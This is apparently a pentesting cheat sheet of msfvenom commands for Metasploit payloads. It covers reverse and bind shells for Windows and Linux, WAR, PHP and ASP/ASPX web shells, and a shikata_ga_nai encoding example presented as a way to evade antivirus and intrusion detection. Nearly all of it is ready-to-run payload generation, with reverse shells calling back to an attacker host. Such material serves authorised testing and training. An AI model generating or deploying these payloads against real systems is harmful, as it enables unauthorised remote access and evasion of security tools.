MSFvenom is a command-line tool from Metasploit used to generate and encode payloads for exploits.

Staged Payloads

Staged payloads send a small initial payload (stager) to the target. The stager executes on the target machine and then connects back to the attacker’s machine to download the remaining payload. Once the full payload is received, it executes and establishes a connection.

Stageless Payloads

Stageless payloads do not use stages. The attacker sends the full payload to the target, which executes immediately and establishes a connection.

A quick way to tell the difference between staged and stageless payloads is by their naming convention.

Staged payloads (e.g., windows/meterpreter/reverse_tcp) use slashes to separate the stages.
Stageless payloads (e.g., windows/meterpreter_reverse_tcp) combine the shell and network communication in one name.

These are the most commonly used shell payloads for remote access and command execution:

MSFvenom - Windows Reverse

MSFvenom is a command-line tool from Metasploit used to generate and encode payloads for exploits.
Link to original

# Stageless payloads - netcat listener
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$IP LPORT=4444 -f exe -o stageless.exe
 
# Stageless payloads - msfconsole listener
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$IP LPORT=4444 -f exe -o stageless.exe
 
# Staged payloads - meterpreter shell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$IP LPORT=4444 -f exe -o staged.exe
 
# Staged payloads - cmd shell
msfvenom -p windows/x64/shell/reverse_tcp LHOST=$IP LPORT=4444 -f exe -o staged.exe

MSFvenom - Windows Bind

MSFvenom is a command-line tool from Metasploit used to generate and encode payloads for exploits.
Link to original

# Stageless payloads - netcat listener
msfvenom -p windows/x64/shell_bind_tcp RHOST=$TARGET_IP LPORT=4444 -f exe -o stageless.exe
 
# Stageless payloads - msfconsole listener
msfvenom -p windows/x64/meterpreter_bind_tcp RHOST=$TARGET_IP LPORT=4444 -f exe -o stageless.exe
 
# Staged payloads - meterpreter shell
msfvenom -p windows/x64/meterpreter/bind_tcp RHOST=$TARGET_IP LPORT=4444 -f exe -o staged.exe
 
# Staged payloads - cmd shell
msfvenom -p windows/x64/shell/bind_tcp RHOST=$TARGET_IP LPORT=4444 -f exe -o staged.exe

MSFvenom - Linux Reverse

MSFvenom is a command-line tool from Metasploit used to generate and encode payloads for exploits.
Link to original

# Stageless payloads - netcat listener
msfvenom -p linux/x64/shell_reverse_tcp LHOST=$IP LPORT=4444 -f elf -o stageless
 
# Stageless payloads - msfconsole listener
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=$IP LPORT=4444 -f elf -o stageless
 
# Staged payloads - meterpreter shell
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=$IP LPORT=4444 -f elf -o staged
 
# Staged payloads - cmd shell
msfvenom -p linux/x64/shell/reverse_tcp LHOST=$IP LPORT=4444 -f elf -o staged

MSFvenom - Linux Bind

MSFvenom is a command-line tool from Metasploit used to generate and encode payloads for exploits.
Link to original

# Stageless payloads - netcat listener
msfvenom -p linux/x64/shell_bind_tcp RHOST=$TARGET_IP LPORT=4444 -f elf -o stageless
 
# Staged payloads - meterpreter shell
msfvenom -p linux/x64/meterpreter/bind_tcp RHOST=$TARGET_IP LPORT=4444 -f elf -o staged
 
# Staged payloads - cmd shell
msfvenom -p linux/x64/shell/bind_tcp RHOST=$TARGET_IP LPORT=4444 -f elf -o staged

WAR File - Reverse

The Web Application Resource or Web application ARchive (WAR) is a file used to distribute a collection of JAR-files.

# Stageless payloads - netcat listener
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$IP LPORT=4444 -f war -o shell.war

PHP - Reverse

PHP is a general-purpose scripting language geared towards web development. It was originally created by Danish-Canadian programmer Rasmus Lerdorf in 1993 and released in 1995.
Link to original

# Stageless payloads - exploit/multi/handler listener
msfvenom -p php/meterpreter_reverse_tcp LHOST=$IP LPORT=4444 -f raw > shell.php

ASP - Reverse

The Active Server Pages (ASP) is Microsoft’s first server-side scripting language and engine for dynamic web pages.
ASP runs on IIS, and ASPX runs on .Net framework. diff

# ASP
# Staged payloads - meterpreter shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$IP LPORT=4444 -f asp > shell.asp
 
# ASPX
# Staged payloads - meterpreter shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$IP LPORT=4444 -f aspx > shell.aspx

Encoders

Encoders are used to transform the payload by encoding it, often to avoid detection by security tools like antivirus (AV) or intrusion detection systems (IDS).

Shikata Ga Nai (仕方がない), meaning nothing can be done, is one of the most commonly used encoding schemes because it is difficult to detect. However, it is likely to be detected by most antivirus software today.

# List available encoders
msfvenom -l encoders
 
# Example using the encoders with `-i` --iterations.
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=$IP LPORT=4444 -e x86/shikata_ga_nai -f exe -i 10 -o shell.exe

☠️ ζHUB

Explorer

MSFvenom

Staged Payloads

Stageless Payloads

MSFvenom - Windows Reverse

MSFvenom - Windows Bind

MSFvenom - Linux Reverse

MSFvenom - Linux Bind

WAR File - Reverse

PHP - Reverse

ASP - Reverse

Encoders

Explorer

Table of Contents

Backlinks